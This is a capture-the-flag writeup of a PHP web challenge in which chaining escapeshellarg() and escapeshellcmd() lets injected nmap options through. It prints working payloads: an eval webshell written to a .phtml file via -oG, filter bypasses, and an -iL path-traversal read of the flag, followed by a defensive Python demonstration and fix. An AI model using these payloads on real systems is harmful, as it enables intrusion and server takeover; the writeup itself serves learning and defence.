2020 Wangding Cup, Rosefinch group, Web: nmap
2022-07-06 11:32:00 【Her&mes】
WP
The challenge tests two things:
1. Use of nmap
2. The vulnerability that arises when escapeshellarg() and escapeshellcmd() are used together
The first is easy to spot, since the title gives it away.
The second point I did not know! I don't know where I was supposed to get it from; I was stumped.
Looking at other people's writeups, they refer to [BUUCTF 2018]Online Tool, a code audit challenge whose source directly shows the parameter being processed by escapeshellarg() and escapeshellcmd().
The two challenges cannot be called similar; they can only be called exactly the same.
nmap output-related parameters
The nmap Chinese-language site lists the following:
-oN (normal output)
-oX (XML output)
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep output)
-oA (output to all formats)
There are other miscellaneous output options you can look up; here -oG is used to construct the payload.
The core of the payload is
<?php @eval($_POST["hack"]);?> -oG hack.php
However, after sending it, the response echoes the word "hacker".
There is a filter. Fuzz testing shows that php is filtered but phtml is not, and PHP's short tag can replace <?php, which gives:
<?= @eval($_POST["hack"]);?> -oG hack.phtml
That is still not enough: after this payload has been processed by escapeshellarg() and escapeshellcmd(), the file cannot be generated.
The solution is simple: add spaces and single quotes around it, which produces a PHP file that parses normally.
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
The underlying principle is explained in an expert's article on PHP escapeshellarg()+escapeshellcmd().
There are also simpler analyses of escapeshellarg() and escapeshellcmd() by other authors on CSDN.
Besides writing a webshell, the flag can also be read directly by using the -iL parameter:
' -iL ../../../../flag -o a '
Then simply access a directly. The following also works, but the file to access is a' instead:
' -iL ../../../../flag -o a
The reason is again those two functions.
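The quoting behaviour behind the payloads above, as an added example that is not part of the original writeup: simplified Python models of the two PHP functions show that escapeshellarg() alone keeps the input as a single argument, while chaining escapeshellcmd() after it lets an option split out. Assumptions: Unix PHP behaviour, ASCII input, a hypothetical "nmap <host>" command line, a constructed sample input, and is_valid_target as a hypothetical allowlist check applied before any command is built.

```python
import ipaddress
import re
import shlex

# Simplified Python models of PHP's Unix behaviour for ASCII input.
# Illustrative re-implementations, not PHP's own code.
CMD_SPECIALS = set("#&;`|*?~<>^()[]{}$\\\n\xff")

def escapeshellarg(s):
    # Wrap in single quotes; every embedded ' becomes '\''
    return "'" + s.replace("'", "'\\''") + "'"

def escapeshellcmd(s):
    # Backslash-escape metacharacters; a quote is escaped only if unpaired.
    out, open_quote = [], None
    for i, ch in enumerate(s):
        if ch in "'\"":
            if open_quote is None and ch in s[i + 1:]:
                open_quote = ch        # opens a pair: left untouched
            elif open_quote == ch:
                open_quote = None      # closes the pair: left untouched
            else:
                out.append("\\")       # unpaired quote is escaped
        elif ch in CMD_SPECIALS:
            out.append("\\")           # includes the backslash itself
        out.append(ch)
    return "".join(out)

def argv_seen_by_shell(host, double_escape):
    # Hypothetical command line; shlex.split applies POSIX sh quoting rules.
    arg = escapeshellarg(host)
    if double_escape:
        arg = escapeshellcmd(arg)
    return shlex.split("nmap " + arg)

# Allowlist: letters, digits, dots, hyphens; never starts with '-'.
HOSTNAME = re.compile(r"[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?")

def is_valid_target(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return HOSTNAME.fullmatch(host) is not None

if __name__ == "__main__":
    sample = "' -oG scan.txt '"   # constructed input, benign file name
    print(argv_seen_by_shell(sample, False))  # stays one argument
    print(argv_seen_by_shell(sample, True))   # -oG splits out as an option
    print(is_valid_target(sample), is_valid_target("192.0.2.10"))
```

The fix is to call escapeshellarg() only once, never followed by escapeshellcmd(), and to reject anything that is not an IP address or hostname before it reaches the command line.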